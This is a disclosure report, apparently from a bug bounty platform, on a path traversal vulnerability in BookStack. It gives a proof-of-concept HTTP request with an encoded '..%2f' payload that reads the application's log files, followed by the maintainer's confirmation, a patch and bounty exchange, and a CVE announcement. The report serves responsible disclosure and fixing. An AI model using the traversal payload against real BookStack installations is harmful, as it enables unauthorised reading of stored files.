Path Traversal in bookstackapp/bookstack

Valid

Reported on

Oct 30th 2021


Description

During reading recent BookStack source code (85dc8d) I discovered path traversal vulnerability. Authenticated user can have access to all files stored in storage directory.

Proof of Concept

GET /uploads/images/..%2f/..%2f/logs/laravel.log HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: XSRF-TOKEN=eyJpdiI6IkY0TGptRjlIa29xXC9iSFZqaE91bzVnPT0iLCJ2YWx1ZSI6Im9nZVZSblYxQmt1QXE5Tk9wS0NHVnhraGUySWlrNjhEZGVyeWhoN0ZOdjcxc2ZzTUFIYlozTHVJVzFMZ3VMMjdROUhCUTFjY2s4MVl0MUIxNGU0eWlnT1ErQlpUNHBGQTBJOHErcjR3MW1USVlkbGxCN21INm5pSDZVbk1pQkVBIiwibWFjIjoiNjZkNTUzM2YzMDE2ZjQwZTBiZTM5MTQ5NDY4NjQ4NmE1YzlkOTBhMDIyZjIyNTI2YjYxNjdiMWVhY2ZiMThiZCJ9; bookstack_session=eyJpdiI6Ik1iSDluUVVNU2JMblh0YmJmSjhNSEE9PSIsInZhbHVlIjoiS04wWk5DaEthMVVxUVFuMlwvNGdqVHpHRE95bFk1VjNJTzRvZTZQeVV1blZ3SUhFQ21ySTF1eFRWUWFtZlBiTEdTVzlCWlFxOGdUVEl4RmN1aDhIcUNzXC9tamFKQk1hVStuS2o3RUlUczJQRlo2OGp6NGs2OHU3Q1FGMjZJVlpLUSIsIm1hYyI6ImM3NmY2YWQ0MjdlYTU5OGEyMmQxNWI1NDMyMTQwMzE3NWMzODhiNmFiZDJhN2VmODA1YzExOTVjMWY1MTZmNTIifQ%3D%3D
Upgrade-Insecure-Requests: 1


Impact

Read log files which paths are predictable.

We have contacted a member of the bookstackapp/bookstack team and are waiting to hear back a year ago
Dan Brown
a year ago

Maintainer


Thanks you so much again @theworstcomrade. Have verified on my own instance. Looks like there are some level of webserver protections that prevent this going too far up which is something but still far from ideal.

I'm especially annoyed at myself for having this vulnerability. Think I need to do a review through all image and attachment systems as many of these were written before I've been exposed to, and learnt from, a wide range of attack vectors.

Will mark this as valid and work into a patch to be deployed with the other fix.

Since you won't be paid due to the depleted bucket, is there a way I can send you £40 myself? I really appreciate your efforts of discovering and reporting this.

Dan Brown validated this vulnerability a year ago
theworstcomrade has been awarded the disclosure bounty
The fix bounty is now up for grabs
Dan Brown marked this as fixed with commit 43830a a year ago
Dan Brown has been awarded the fix bounty
This vulnerability will not receive a CVE
ImageController.php#L38 has been validated
theworstcomrade
a year ago

Researcher


@ssdmanbrown This patch looks good, I am no longer able to repeat the vulnerability. Thank You also for the bounty.

Jamie Slome
a year ago

Admin


CVE published! 🎊

to join this conversation